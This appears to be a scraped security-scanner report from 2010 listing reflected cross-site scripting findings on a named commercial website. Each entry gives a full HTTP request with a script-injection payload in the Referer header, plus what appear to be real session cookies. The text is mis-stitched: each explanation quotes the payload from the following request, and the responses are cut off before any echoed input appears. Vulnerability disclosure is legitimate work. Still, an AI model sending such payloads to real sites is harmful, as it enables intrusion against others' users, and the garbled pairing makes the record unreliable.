GET /resources.design-gallery.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=39955"><script>alert(1)</script>20654db5c4
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:05 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26312"><script>alert(1)</script>3a5e59c2b72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.dg.Windows.42.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=26312"><script>alert(1)</script>3a5e59c2b72
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:03 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2404"><script>alert(1)</script>6d600d14d2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.dg.project.Peachtree.87.116.210473.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=d2404"><script>alert(1)</script>6d600d14d2b
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:08 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eea9"><script>alert(1)</script>322aae41a6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.dg.project.Vinyl-Windows-.42.74.321268.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=5eea9"><script>alert(1)</script>322aae41a6e
Response (redirected)
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:20 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d2b"><script>alert(1)</script>54678a0cd69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.home-improvement.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=f4d2b"><script>alert(1)</script>54678a0cd69
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:16:29 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!-- /rfs/resources/homeownersResources.jsp -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5799d"><script>alert(1)</script>5ed2f789493 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /resources.tools.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=5799d"><script>alert(1)</script>5ed2f789493
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:41 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13fd"><script>alert(1)</script>52ba572902d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /rfs/aboutus/privacyStatement.jsp HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=e13fd"><script>alert(1)</script>52ba572902d
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:31 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d054"><script>alert(1)</script>b73ffd054e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /rfs/home/guestHome.jsp HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=6d054"><script>alert(1)</script>b73ffd054e7
Response (redirected)
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:15:56 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a397d"><script>alert(1)</script>92231f95331 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /servlet/AffiliateSignupServlet HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=a397d"><script>alert(1)</script>92231f95331
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:16:23 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960e3"><script>alert(1)</script>23cac65e19e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /servlet/TermsServlet HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=960e3"><script>alert(1)</script>23cac65e19e
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:16:31 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf97d"><script>alert(1)</script>c9d60a7d296 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitesearch/SiteSearchServlet HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=bf97d"><script>alert(1)</script>c9d60a7d296
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:15:55 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a166a"><script>alert(1)</script>fd92c83ed89 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /videos/ HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=a166a"><script>alert(1)</script>fd92c83ed89
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:39 GMT Server: Apache/2 P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">